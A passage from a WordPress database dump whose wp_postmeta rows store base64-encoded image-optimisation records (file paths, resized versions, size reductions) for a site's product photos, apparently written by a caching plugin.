3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDY3Qy0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDY3Qy0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxMDQ3NiwidGltZSI6MTQ4MzU2NTAxMywiaWQiOjE3NTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDY3Qy0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2N0MtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy00NjdDLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1MzQsInRpbWUiOjE0ODM1NjUwMTYsImlkIjoxNzUzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2N0MtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NjdDLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDY3Qy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDY3LCJ0aW1lIjoxNDgzNTY1MDE5LCJpZCI6MTc1M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NjdDLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDY3Qy0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTQ2N0MtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjUwMSwidGltZSI6MTQ4MzU2NTAyMywiaWQiOjE3NTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDY3Qy01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2N0MtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy00NjdDLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxNDAzLCJ0aW1lIjoxNDgzNTY1MDI3LCJpZCI6MTc1M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2N0MtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NjdDLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDY3Qy0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NDEyLCJ0aW1lIjoxNDgzNTY1MDMwLCJpZCI6MTc1M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2N0MtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NjdDLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDY3Qy0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NDk3LCJ0aW1lIjoxNDgzNTY1MDM0LCJpZCI6MTc1M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2N0MtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NjdDLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDY3Qy0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NTU0LCJ0aW1lIjoxNDgzNTY1MDM3LCJpZCI6MTc1M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2N0MtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NjdDLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDY3Qy00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NzUyLCJ0aW1lIjoxNDgzNTY1MDQwLCJpZCI6MTc1M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2N0MtOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDY3Qy05MHg5MC5qcGciLCJ3aWR0aCI6IjkwIiwiaGVpZ2h0IjoiOTAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDY3Qy05MHg5MC5qcGciLCJyZWR1Y3Rpb24iOjM2MCwidGltZSI6MTQ4MzU2NTA0NCwiaWQiOjE3NTN9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29250, 1752, 'wpfc_optimisation_reduction', '26993'); 
INSERT INTO `wp_postmeta` VALUES (29251, 1752, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDY1Qy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2NUMuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU2NTA0OCwiaWQiOiIxNzUyIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NjVDLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDY1Qy0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTQ2NUMtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjkyNiwidGltZSI6MTQ4MzU2NTA1MiwiaWQiOjE3NTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDY1Qy04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2NUMtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy00NjVDLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjozMTQ2LCJ0aW1lIjoxNDgzNTY1MDU1LCJpZCI6MTc1Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NjVDLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDY1Qy03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTQ2NUMtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjI4NjAsInRpbWUiOjE0ODM1NjUwNTgsImlkIjoxNzUyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2NUMtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDY1Qy0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDY1Qy0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxMzQ0MCwidGltZSI6MTQ4MzU2NTA2MiwiaWQiOjE3NTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDY1Qy0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2NUMtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy00NjVDLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo2MDAsInRpbWUiOjE0ODM1NjUwNjYsImlkIjoxNzUyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2NUMtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NjVDLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDY1Qy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NTA0LCJ0aW1lIjoxNDgzNTY1MDY5LCJpZCI6MTc1Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NjVDLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDY1Qy0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTQ2NUMtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjU4MSwidGltZSI6MTQ4MzU2NTA3NywiaWQiOjE3NTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDY1Qy01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2NUMtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy00NjVDLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxOTM4LCJ0aW1lIjoxNDgzNTY1MDgwLCJpZCI6MTc1Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2NUMtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NjVDLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDY1Qy0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NDEyLCJ0aW1lIjoxNDgzNTY1MDg0LCJpZCI6MTc1Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2NUMtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NjVDLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDY1Qy0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NTY5LCJ0aW1lIjoxNDgzNTY1MDg3LCJpZCI6MTc1Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2NUMtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NjVDLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDY1Qy0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NjYwLCJ0aW1lIjoxNDgzNTY1MDkwLCJpZCI6MTc1Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2NUMtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NjVDLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDY1Qy00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6OTY4LCJ0aW1lIjoxNDgzNTY1MDk0LCJpZCI6MTc1Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2NUMtOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDY1Qy05MHg5MC5qcGciLCJ3aWR0aCI6IjkwIiwiaGVpZ2h0IjoiOTAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDY1Qy05MHg5MC5qcGciLCJyZWR1Y3Rpb24iOjM4OSwidGltZSI6MTQ4MzU2NTA5NywiaWQiOjE3NTJ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29252, 1751, 'wpfc_optimisation_reduction', '22341'); 
INSERT INTO `wp_postmeta` VALUES (29253, 1751, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDYySC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2MkguanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU2NTEwMiwiaWQiOiIxNzUxIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NjJILTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDYySC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTQ2MkgtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjcyNSwidGltZSI6MTQ4MzU2NTEwNSwiaWQiOjE3NTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDYySC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2MkgtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy00NjJILTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoyNjcxLCJ0aW1lIjoxNDgzNTY1MTA5LCJpZCI6MTc1MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NjJILTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDYySC03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTQ2MkgtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjIzNjEsInRpbWUiOjE0ODM1NjUxMTIsImlkIjoxNzUxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2MkgtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDYySC0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDYySC0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxMDc3NiwidGltZSI6MTQ4MzU2NTExNiwiaWQiOjE3NTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1